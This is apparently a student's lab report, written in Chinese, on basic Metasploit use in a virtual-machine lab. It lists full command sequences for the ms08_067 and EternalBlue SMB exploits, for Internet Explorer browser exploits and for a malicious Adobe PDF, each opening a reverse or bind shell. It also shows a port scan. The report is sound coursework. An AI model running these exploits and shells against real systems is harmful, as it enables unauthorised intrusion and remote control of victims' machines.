2019-2020-2 20174310隋润起《网络对抗技术》Exp6 MSF基础应用

一、实践内容

   本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:

  1.1一个主动攻击实践,如ms08_067

  1.2 一个针对浏览器的攻击,如ms11_050

  1.3 一个针对客户端的攻击,如Adobe

  1.4 成功应用任何一个辅助模块

  以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的

二、实践过程

攻击机:

  • Kali:192.168.80.131

靶机:

  • WinXP:192.168.80.134

实验前准备:

检测两个虚拟机能否ping通

刚开始出现靶机能够ping攻击机,而攻击机不能ping靶机的情况

在靶机中通过cmd命令关闭防火墙后,二者能够互相ping通

 

2.1 一个主动攻击实践

2.1.1 ms08_067漏洞渗透攻击实践

攻击者试探靶机是否存在ms08_067这个漏洞

  • nmap -sS -A --script=smb-vuln-ms08-067 -PO 192.168.80.134

 可以看到靶机确实存在这个漏洞

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • use exploit/windows/smb/ms08_067_netapi
  • set payload generic/shell_reverse_tcp //tcp反向回连
  • set LHOST 192.168.80.131 //Kali即攻击方ip
  • set LPORT 4310 //端口
  • set RHOST 192.168.80.134 //xp靶机ip(漏洞端口已经固定)
  • exploit //攻击

可以看到回连成功

 通过一些cmd指令,搜寻靶机的信息

 

2.1.2MS17_010漏洞渗透攻击实践

使用指令

  • nmap --script=vuln 192.168.80.134

看看靶机是否还有其他的漏洞可以实践。

 发现还存在MS17_010这个漏洞

在攻击机kali输入msfconsole进入控制台,依次输入以下指令:

  • use exploit/windows/smb/ms17_010_eternalblue
  • set payload generic/shell_reverse_tcp //tcp反向回连
  • set LHOST 192.168.80.131 //Kali即攻击方ip
  • set LPORT 4310 //端口
  • set RHOST 192.168.80.134 //xp靶机ip(漏洞端口已经固定)
  • exploit //攻击

 发现回连失败

用show targets命令发现这个漏洞只有win7能够使用

 打开win7虚拟机,ipconfig观察IP地址

 更改靶机ip地址为192.168.80.131,再次攻击(注意将靶机防火墙关闭)

 回连成功

并查看IP信息 

2.2针对浏览器的攻击

2.2.1ms10_018漏洞攻击

首先查看浏览器漏洞:

  • cd /usr/share/metasploit-framework/modules/exploits/windows/browser

输入 ls 即可看到很多漏洞代码,选择

  • ms10_018_ie_behaviors.rb

 进入msf,输入

  • search ms10_018

寻找相关漏洞模块

 

依次输入以下指令:

  • use exploit/windows/browser/ms10_018_ie_behaviors 
  • set payload windows/meterpreter/reverse_tcp 
  • set LHOST 192.168.80.131 //Kali即攻击方ip
  • set SRVHOST 192.168.80.131 //设置服务器IP(攻击者IP)
  • exploit //攻击

 

 在靶机访问对应网址

 查看会话,使用指令

  • sessions

选择会话

  • sessions 2

并获得靶机的控制权,查看靶机ip信息

 

 命令并不能识别,换一个漏洞 ms10_046再次尝试,过程与上面类似

 

 生成成功,再次访问

 再次通过session1进行攻击

 这次成功了

2.3 针对客户端的攻击——Adobe攻击

启动msf 输入search adobe查询针对adobe攻击模块

 

使用

  • use windows/fileformat/adobe_cooltype_sing

设置payloads

依次输入下列指令

  • set payload windows/meterpreter/bind_tcp
  • set RHOST 192.168.80.134 //靶机ip
  • set LPORT 4310 //攻击端口
  • exploit//生成pdf

 

 生成pdf成功,cp复制到根目录

复制到靶机并在靶机钟打开PDF。

在msf中,用如下指令进行监听

  • use exploit/multi/handler //进入监听模块
  • set payload windows/meterpreter/bind_tcp //选择攻击载荷
  • set RHOST 192.168.80.134//靶机IP
  • set LPORT 4310 //攻击端口
  • exploit

获得权限,使用ipconfig指令进行验证

 成功

3.4成功应用任何一个辅助模块

3.4.1scanner/portscan/tcp(唯一)

进入msf输入【show auxiliary】指令,查看可用的辅助模块。

选择了

  • scanner/portscan/tcp

模块,该模块用来探测靶机的开放的tcp端口

依次输入指令

  • use scanner/portscan/tcp
  • set RHOSTS 192.168.80.134
  • exploit

便得到探测结果

三、基础问题回答

4.1用自己的话解释什么是exploit,payload,encode

  • exploit就是漏洞的利用,如何利用漏洞,将我们制造的恶意代码传递过去,起到一个通道的作用。
  • payload就是一段恶意代码,在靶机的漏洞发挥作用,达到我们某种目的的代码,通过通道传输到靶机,发挥作用。
  • encode就是包装,将payload的代码进行改造,变得不那么容易被发现。

4.2离实战还缺些什么技术或步骤

  • 我们的实验与实际的生活还是有一定的差距,默认的将防火墙关闭,等等多种预设条件下进行的。要想与实战接轨,就要加强对信息的收集能力,在我们的实验中,实际上对靶机是了如指掌,而实战我们对靶机可能是一无所知,要从零开始对信息进行收集。其次我们的一些后门程序和网址,被攻击方方也不会乖乖的进行访问,我们需要对我们的攻击手段进行伪装,让对方在无意识的情况下被攻击,并且能够绕过一些防护软件的防御。

四、实践总结

这次实验是对于msf的一些简单应用,对于一些特定的漏洞,通过msf的一些工具在靶机上发挥作用。通过这次实验,我学会如何使用msf,遇到不会的就info查看详情,配置参数就是options查看,这样可以让我自己解决一些问题。同时也要加强英语的学习,这样大大的节省了查询单词的时间

posted @ 2020-04-30 20:27  20174310隋润起  阅读(188)  评论(0编辑  收藏  举报